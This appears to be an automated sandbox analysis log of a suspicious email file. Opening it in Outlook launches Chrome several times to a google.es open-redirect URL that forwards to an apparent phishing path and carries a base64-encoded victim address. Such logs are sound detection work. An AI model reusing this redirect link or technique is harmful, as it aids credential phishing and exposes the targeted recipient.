Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.16:49771 version: TLS 1.2
Source: classification engineClassification label: mal48.winEML@60/57@89/331
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\Documents\Outlook Files\~Outlook Data File - NoEmail.pst.tmp
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\AppData\Local\Temp\Outlook Logging\OUTLOOK_16_0_16827_20130-20241115T1512180845-6428.etl
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\Desktop\ee0b6b037b16b54632b6b37d1fb72727.eml"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "F05FBD8A-C85E-48DC-96FE-34574180FF3D" "A0019601-66DF-4798-A215-D39904F8E346" "6428" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.google.es/url?q=querywbir(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3D&sa=t&url=amp%2fcondominioanacarolina.com.br%2flockeq%2fwtolwzl224moscrjiovolvgdhya1s0oym4bi4/a2VsbHkuc3dhbnNvbkBtb250cm9zZS1lbnYuY29t
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.google.es/url?q=querywbir(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3D&sa=t&url=amp%2fcondominioanacarolina.com.br%2flockeq%2fwtolwzl224moscrjiovolvgdhya1s0oym4bi4/a2VsbHkuc3dhbnNvbkBtb250cm9zZS1lbnYuY29t
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1996 --field-trial-handle=1760,i,5962285065134541861,7824030978840373784,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1968 --field-trial-handle=1964,i,10127388786673164989,1744962959261418216,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "F05FBD8A-C85E-48DC-96FE-34574180FF3D" "A0019601-66DF-4798-A215-D39904F8E346" "6428" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.google.es/url?q=querywbir(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3D&sa=t&url=amp%2fcondominioanacarolina.com.br%2flockeq%2fwtolwzl224moscrjiovolvgdhya1s0oym4bi4/a2VsbHkuc3dhbnNvbkBtb250cm9zZS1lbnYuY29t
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.google.es/url?q=querywbir(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3D&sa=t&url=amp%2fcondominioanacarolina.com.br%2flockeq%2fwtolwzl224moscrjiovolvgdhya1s0oym4bi4/a2VsbHkuc3dhbnNvbkBtb250cm9zZS1lbnYuY29t
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1996 --field-trial-handle=1760,i,5962285065134541861,7824030978840373784,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1968 --field-trial-handle=1964,i,10127388786673164989,1744962959261418216,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.google.es/url?q=querywbir(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3D&sa=t&url=amp%2fcondominioanacarolina.com.br%2flockeq%2fwtolwzl224moscrjiovolvgdhya1s0oym4bi4/a2VsbHkuc3dhbnNvbkBtb250cm9zZS1lbnYuY29t
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=1856,i,8679220859908409652,11221365071905276730,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.google.es/url?q=querywbir(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3D&sa=t&url=amp%2fcondominioanacarolina.com.br%2flockeq%2fwtolwzl224moscrjiovolvgdhya1s0oym4bi4/a2VsbHkuc3dhbnNvbkBtb250cm9zZS1lbnYuY29t
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=1856,i,8679220859908409652,11221365071905276730,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.google.es/url?q=querywbir(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3D&sa=t&url=amp%2fcondominioanacarolina.com.br%2flockeq%2fwtolwzl224moscrjiovolvgdhya1s0oym4bi4/a2VsbHkuc3dhbnNvbkBtb250cm9zZS1lbnYuY29t
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1996,i,17604088894808587731,15684709552865746859,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.google.es/url?q=querywbir(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3D&sa=t&url=amp%2fcondominioanacarolina.com.br%2flockeq%2fwtolwzl224moscrjiovolvgdhya1s0oym4bi4/a2VsbHkuc3dhbnNvbkBtb250cm9zZS1lbnYuY29t
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1996,i,17604088894808587731,15684709552865746859,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: apphelp.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: c2r64.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: userenv.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: msasn1.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: cryptsp.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: rsaenh.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: cryptbase.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: gpapi.dll
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{A6FF50C0-56C0-71CA-5732-BED303A59628}\InProcServer32
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEWindow found: window name: SysTabControl32
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
